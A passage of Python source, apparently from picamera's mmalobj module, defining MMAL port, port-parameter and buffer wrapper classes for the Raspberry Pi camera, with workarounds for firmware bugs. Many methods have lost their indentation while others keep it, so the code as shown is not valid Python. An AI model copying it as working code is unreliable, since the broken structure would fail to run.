format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
    def commit(self):
        """
        Commits the port's configuration and automatically updates the number
        and size of associated buffers according to the recommendations of the
        MMAL library. This is typically called after adjusting the port's
        format and/or associated settings (like width and height for video
        ports).
        """
        mmal_check(
            mmal.mmal_port_format_commit(self._port),
            prefix="Format couldn't be set on port %s" % self.name)
        # Workaround: Unfortunately, there is an upstream issue with the
        # buffer_num_recommended which means it can't currently be used (see
        # discussion in raspberrypi/userland#167). There's another upstream
        # issue with buffer_num_min which means we need to guard against 0
        # values...
        self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
        # Prefer the recommended buffer size, falling back to the minimum
        # when the recommendation is zero
        self._port[0].buffer_size = (
            self._port[0].buffer_size_recommended
            if self._port[0].buffer_size_recommended > 0 else
            self._port[0].buffer_size_min)
    @property
    def pool(self):
        """
        Returns the :class:`MMALPool` associated with the port, if any.
        """
        return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
    def send_buffer(self, buf):
        """
        Send :class:`MMALBuffer` *buf* to the port.
        Raises :exc:`PiCameraPortDisabled` if the port is disabled when the
        send is attempted.
        """
        if (
                self.type == mmal.MMAL_PORT_TYPE_INPUT and
                isinstance(self._connection, MMALPythonConnection) and
                self._connection._callback is not None):
            # The port is fed by a Python-implemented connection with a user
            # callback; give the callback the chance to modify or drop the
            # buffer before it reaches the port
            try:
                modified_buf = self._connection._callback(self._connection, buf)
            except:
                buf.release()
                raise
            else:
                if modified_buf is None:
                    # Callback dropped the buffer
                    buf.release()
                    return
                else:
                    buf = modified_buf
        try:
            mmal_check(
                mmal.mmal_port_send_buffer(self._port, buf._buf),
                prefix="cannot send buffer to port %s" % self.name)
        except PiCameraMMALError as e:
            # If port is disabled, convert exception for convenience
            if e.status == mmal.MMAL_EINVAL and not self.enabled:
                raise PiCameraPortDisabled(
                    'cannot send buffer to disabled port %s' % self.name)
            else:
                raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).
        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. The callback should return ``True`` when processing is
        complete and no further calls are expected (e.g. at frame-end for an
        image encoder), and ``False`` otherwise.
        """
        def wrapper(port, buf):
            # Invoked by the MMAL library for each buffer emitted by the
            # port; wraps the raw header and forwards to the user callback
            buf = MMALBuffer(buf)
            try:
                # Once the callback signals completion, _stopped suppresses
                # any further invocations of it
                if not self._stopped and callback(self, buf):
                    self._stopped = True
            finally:
                # Always recycle the buffer and try to hand a fresh one back
                # to the port so the pipeline keeps flowing
                buf.release()
                try:
                    self._pool.send_buffer(block=False)
                except PiCameraPortDisabled:
                    # The port was disabled, no point trying again
                    pass
        # Workaround: There is a bug in the MJPEG encoder that causes a
        # deadlock if the FIFO is full on shutdown. Increasing the encoder
        # buffer size makes this less likely to happen. See
        # raspberrypi/userland#208. Connecting the encoder component resets the
        # output port's buffer size, hence why we correct this here, just
        # before enabling the port.
        if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
            self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
        if callback:
            assert self._stopped
            assert self._pool is None
            self._stopped = False
            self._pool = MMALPortPool(self)
            try:
                # Keep a reference to the ctypes callback wrapper so it isn't
                # garbage-collected while MMAL holds the function pointer
                self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
                mmal_check(
                    mmal.mmal_port_enable(self._port, self._wrapper),
                    prefix="Unable to enable port %s" % self.name)
                # If this port is an output port, send it all the buffers
                # in the pool. If it's an input port, don't bother: the user
                # will presumably want to feed buffers to it manually
                if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
                    self._pool.send_all_buffers(block=False)
            except:
                self._pool.close()
                self._pool = None
                self._stopped = True
                raise
        else:
            super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
    @property
    def connection(self):
        """
        If this port is connected to another, this property holds the
        :class:`MMALConnection` or :class:`MMALPythonConnection` object which
        represents that connection. If this port is not connected, this
        property is ``None``.
        """
        return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
    """
    Represents an MMAL port used to pass video data.
    """
    __slots__ = ()
    def __repr__(self):
        if self._port is not None:
            return (
                '<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
                'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
                    self.name, mmal.FOURCC_str(self.format),
                    self._port[0].buffer_num, self._port[0].buffer_size,
                    self.framesize, self.framerate,
                    mmal.FOURCC_str(self.colorspace)))
        else:
            return '<MMALVideoPort closed>'
    def _get_framesize(self):
        # Report the crop (visible) size rather than the aligned-up buffer
        # dimensions written by _set_framesize
        return PiResolution(
            self._port[0].format[0].es[0].video.crop.width,
            self._port[0].format[0].es[0].video.crop.height,
            )
    def _set_framesize(self, value):
        value = to_resolution(value)
        video = self._port[0].format[0].es[0].video
        # The padded buffer dimensions are aligned up to the 32x16 block
        # size; the requested size is recorded in the crop rectangle
        video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
        video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
        video.crop.width = value.width
        video.crop.height = value.height
    framesize = property(_get_framesize, _set_framesize, doc="""\
        Retrieves or sets the size of the port's video frames as a (width,
        height) tuple. This attribute implicitly handles scaling the given
        size up to the block size of the camera (32x16).
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
    def _get_framerate(self):
        video = self._port[0].format[0].es[0].video
        try:
            return Fraction(
                video.frame_rate.num,
                video.frame_rate.den)
        except ZeroDivisionError:
            # A zero denominator indicates an unset framerate; report 0fps
            assert video.frame_rate.num == 0
            return Fraction(0, 1)
    def _set_framerate(self, value):
        value = to_fraction(value)
        video = self._port[0].format[0].es[0].video
        video.frame_rate.num = value.numerator
        video.frame_rate.den = value.denominator
    framerate = property(_get_framerate, _set_framerate, doc="""\
        Retrieves or sets the framerate of the port's video frames in fps.
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
    def _get_colorspace(self):
        return self._port[0].format[0].es[0].video.color_space
    def _set_colorspace(self, value):
        self._port[0].format[0].es[0].video.color_space = value
    colorspace = property(_get_colorspace, _set_colorspace, doc="""\
        Retrieves or sets the color-space of the port's frames.
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
class MMALAudioPort(MMALPort):
    """
    Represents an MMAL port used to pass audio data.
    """
    __slots__ = ()
    def __repr__(self):
        # A closed port has no underlying MMAL structure left to describe
        if self._port is None:
            return '<MMALAudioPort closed>'
        return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
            self.name, mmal.FOURCC_str(self.format),
            self._port[0].buffer_num, self._port[0].buffer_size)
class MMALSubPicturePort(MMALPort):
    """
    Represents an MMAL port used to pass sub-picture (caption) data.
    """
    __slots__ = ()
    def __repr__(self):
        # A closed port has no underlying MMAL structure left to describe
        if self._port is None:
            return '<MMALSubPicturePort closed>'
        return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
            self.name, mmal.FOURCC_str(self.format),
            self._port[0].buffer_num, self._port[0].buffer_size)
class MMALPortParams(object):
    """
    Represents the parameters of an MMAL port. This class implements the
    :attr:`MMALControlPort.params` attribute.
    Internally, the class understands how to convert certain structures to more
    common Python data-types. For example, parameters that expect an
    MMAL_RATIONAL_T type will return and accept Python's
    :class:`~fractions.Fraction` class (or any other numeric types), while
    parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
    value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
    treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
    structures will be treated as plain ints.
    Parameters that expect more complex structures will return and expect
    those structures verbatim.
    """
    __slots__ = ('_port',)
    def __init__(self, port):
        super(MMALPortParams, self).__init__()
        self._port = port
    def __getitem__(self, key):
        # Map the parameter id to its ctypes structure type
        dtype = PARAM_TYPES[key]
        # Use the short-cut functions where possible (teeny bit faster if we
        # get some C to do the structure wrapping for us)
        func = {
            mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
            mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
            mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
            mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
            mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
            mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
            }.get(dtype, mmal.mmal_port_parameter_get)
        # Converter from the raw ctypes result to a friendly Python value;
        # complex structures pass through unchanged
        conv = {
            mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
            mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
            mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
            }.get(dtype, lambda v: v)
        if func == mmal.mmal_port_parameter_get:
            # Generic path: allocate the full parameter structure with its
            # header initialized, then query into it
            result = dtype(
                mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
                )
            mmal_check(
                func(self._port, result.hdr),
                prefix="Failed to get parameter %d" % key)
        else:
            # Short-cut path: the getter writes directly into a plain ctypes
            # scalar/struct of the matching low-level type
            dtype = {
                mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
                mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
                mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
                mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
                mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
                mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
                }[dtype]
            result = dtype()
            mmal_check(
                func(self._port, key, result),
                prefix="Failed to get parameter %d" % key)
        return conv(result)
    def __setitem__(self, key, value):
        # Map the parameter id to its ctypes structure type
        dtype = PARAM_TYPES[key]
        # Prefer the typed setter short-cuts where available
        func = {
            mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
            mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
            mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
            mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
            mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
            mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
            mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
            }.get(dtype, mmal.mmal_port_parameter_set)
        # Converter from the friendly Python value to what MMAL expects
        conv = {
            mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
            mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
            mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
            }.get(dtype, lambda v: v)
        if func == mmal.mmal_port_parameter_set:
            # Generic path: caller supplies the full structure; sanity-check
            # its header matches the requested parameter
            mp = conv(value)
            assert mp.hdr.id == key
            assert mp.hdr.size >= ct.sizeof(dtype)
            mmal_check(
                func(self._port, mp.hdr),
                prefix="Failed to set parameter %d to %r" % (key, value))
        else:
            mmal_check(
                func(self._port, key, conv(value)),
                prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
    """
    Represents an MMAL buffer header. This is usually constructed from the
    buffer header pointer and is largely supplied to make working with
    the buffer's data a bit simpler. Using the buffer as a context manager
    implicitly locks the buffer's memory and returns the :mod:`ctypes`
    buffer object itself::
        def callback(port, buf):
            with buf as data:
                # data is a ctypes uint8 array with size entries
                print(len(data))
    Alternatively you can use the :attr:`data` property directly, which returns
    and modifies the buffer's data as a :class:`bytes` object (note this is
    generally slower than using the buffer object unless you are simply
    replacing the entire buffer)::
        def callback(port, buf):
            # the buffer contents as a byte-string
            print(buf.data)
    """
    __slots__ = ('_buf',)
    def __init__(self, buf):
        # buf is a pointer to the underlying MMAL buffer header structure
        super(MMALBuffer, self).__init__()
        self._buf = buf
    def _get_command(self):
        return self._buf[0].cmd
    def _set_command(self, value):
        self._buf[0].cmd = value
    command = property(_get_command, _set_command, doc="""\
        The command set in the buffer's meta-data. This is usually 0 for
        buffers returned by an encoder; typically this is only used by buffers
        sent to the callback of a control port.
        """)
    def _get_flags(self):
        return self._buf[0].flags
    def _set_flags(self, value):
        self._buf[0].flags = value
    flags = property(_get_flags, _set_flags, doc="""\
        The flags set in the buffer's meta-data, returned as a bitmapped
        integer. Typical flags include:
        * ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
        * ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
        * ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
        """)
    def _get_pts(self):
        return self._buf[0].pts
    def _set_pts(self, value):
        self._buf[0].pts = value
    pts = property(_get_pts, _set_pts, doc="""\
        The presentation timestamp (PTS) of the buffer, as an integer number
        of microseconds or ``MMAL_TIME_UNKNOWN``.
        """)
    def _get_dts(self):
        return self._buf[0].dts
    def _set_dts(self, value):
        self._buf[0].dts = value
    dts = property(_get_dts, _set_dts, doc="""\
        The decoding timestamp (DTS) of the buffer, as an integer number of
        microseconds or ``MMAL_TIME_UNKNOWN``.
        """)
    @property
    def size(self):
        """
        Returns the length of the buffer's data area in bytes. This will be
        greater than or equal to :attr:`length` and is fixed in value.
        """
        return self._buf[0].alloc_size
    def _get_offset(self):
        return self._buf[0].offset
    def _set_offset(self, value):
        assert 0 <= value <= self.size
        self._buf[0].offset = value
        # Clamp length so offset+length never exceeds the allocated size
        self.length = min(self.size - self.offset, self.length)
    offset = property(_get_offset, _set_offset, doc="""\
        The offset from the start of the buffer at which the data actually
        begins. Defaults to 0. If this is set to a value which would force the
        current :attr:`length` off the end of the buffer's :attr:`size`, then
        :attr:`length` will be decreased automatically.
        """)
    def _get_length(self):
        return self._buf[0].length
    def _set_length(self, value):
        assert 0 <= value <= self.size - self.offset
        self._buf[0].length = value
    length = property(_get_length, _set_length, doc="""\
        The length of data held in the buffer. Must be less than or equal to
        the allocated size of data held in :attr:`size` minus the data
        :attr:`offset`. This attribute can be used to effectively blank the
        buffer by setting it to zero.
        """)
    def _get_data(self):
        # Lock the buffer's memory (via the context manager protocol below)
        # while copying its contents out to a bytes object
        with self as buf:
            return ct.string_at(
                ct.byref(buf, self._buf[0].offset),
                self._buf[0].length)
    def _set_data(self, value):
        value_len = buffer_bytes(value)
        if value_len:
            if value_len > self.size:
                raise PiCameraValueError(
                    'data is too large for buffer (%d > %d)' % (
                        value_len, self.size))
            bp = ct.c_uint8 * value_len
            # Prefer a zero-copy view of the source; fall back to copying
            # when the source is read-only (from_buffer requires writable)
            try:
                sp = bp.from_buffer(value)
            except TypeError:
                sp = bp.from_buffer_copy(value)
            with self as buf:
                ct.memmove(buf, sp, value_len)
        # Note: offset/length are updated even for empty values, which
        # effectively blanks the buffer
        self._buf[0].offset = 0
        self._buf[0].length = value_len
    data = property(_get_data, _set_data, doc="""\
        The data held in the buffer as a :class:`bytes` string. You can set
        this attribute to modify the data in the buffer. Acceptable values
        are anything that supports the buffer protocol, and which contains
        :attr:`size` bytes or less. Setting this attribute implicitly modifies
        the :attr:`length` attribute to the length of the specified value and
        sets :attr:`offset` to zero.
        .. note::
            Accessing a buffer's data via this attribute is relatively slow
            (as it copies the buffer's data to/from Python objects). See the
            :class:`MMALBuffer` documentation for details of a faster (but
            more complex) method.
        """)
    def replicate(self, source):
        """
        Replicates the *source* :class:`MMALBuffer`. This copies all fields
        from the *source* buffer, including the internal :attr:`data` pointer.
        In other words, after replication this buffer and the *source* buffer
        will share the same block of memory for *data*.
        The *source* buffer will also be referenced internally by this buffer
        and will only be recycled once this buffer is released.
        .. note::
            This is fundamentally different to the operation of the
            :meth:`copy_from` method. It is much faster, but imposes the burden
            that two buffers now share data (the *source* cannot be released
            until the replicant has been released).
        """
        mmal_check(
            mmal.mmal_buffer_header_replicate(self._buf, source._buf),
            prefix='unable to replicate buffer')
    def copy_from(self, source):
        """
        Copies all fields (including data) from the *source*
        :class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
        store :attr:`length` bytes from the *source* buffer. This method
        implicitly sets :attr:`offset` to zero, and :attr:`length` to the
        number of bytes copied.
        .. note::
            This is fundamentally different to the operation of the
            :meth:`replicate` method. It is much slower, but afterward the
            copied buffer is entirely independent of the *source*.
        """
        assert self.size >= source.length
        source_len = source._buf[0].length
        if source_len:
            # Lock both buffers' memory while performing the raw copy
            with self as target_buf, source as source_buf:
                ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
        self._buf[0].offset = 0
        self._buf[0].length = source_len
        self.copy_meta(source)
    def copy_meta(self, source):
        """
        Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
        copies all buffer fields with the exception of :attr:`data`,
        :attr:`length` and :attr:`offset`.
        """
        self._buf[0].cmd = source._buf[0].cmd
        self._buf[0].flags = source._buf[0].flags
        self._buf[0].dts = source._buf[0].dts
        self._buf[0].pts = source._buf[0].pts
        self._buf[0].type[0] = source._buf[0].type[0]
    def acquire(self):
        """
        Acquire a reference to the buffer. This will prevent the buffer from
        being recycled until :meth:`release` is called. This method can be
        called multiple times in which case an equivalent number of calls
        to :meth:`release` must be made before the buffer will actually be
        released.
        """
        mmal.mmal_buffer_header_acquire(self._buf)
    def release(self):
        """
        Release a reference to the buffer. This is the opposing call to
        :meth:`acquire`. Once all references have been released, the buffer
        will be recycled.
        """
        mmal.mmal_buffer_header_release(self._buf)
    def reset(self):
        """
        Resets all buffer header fields to default values.
        """
        mmal.mmal_buffer_header_reset(self._buf)
    def __enter__(self):
        # Lock the buffer's memory and expose it as a ctypes uint8 array of
        # alloc_size entries
        mmal_check(
            mmal.mmal_buffer_header_mem_lock(self._buf),
            prefix='unable to lock buffer header memory')
        return ct.cast(
            self._buf[0].data,
            ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
    def __exit__(self, *exc):
        mmal.mmal_buffer_header_mem_unlock(self._buf)
        return False
    def __repr__(self):
        if self._buf is not None:
            return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
                ''.join((
                'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
                'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
                'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
                'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
                'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
                'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
                )), {
                0: 'none',
                mmal.MMAL_EVENT_ERROR: 'error',
                mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
                mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
                mmal.MMAL_EVENT_EOS: 'end-of-stream',
                }[self.command], self.length)
        else:
            return '<MMALBuffer object: ???>'
class MMALQueue(object):
    """
    Represents an MMAL buffer queue. Buffers can be added to the queue with the
    :meth:`put` method, and retrieved from the queue (with optional wait
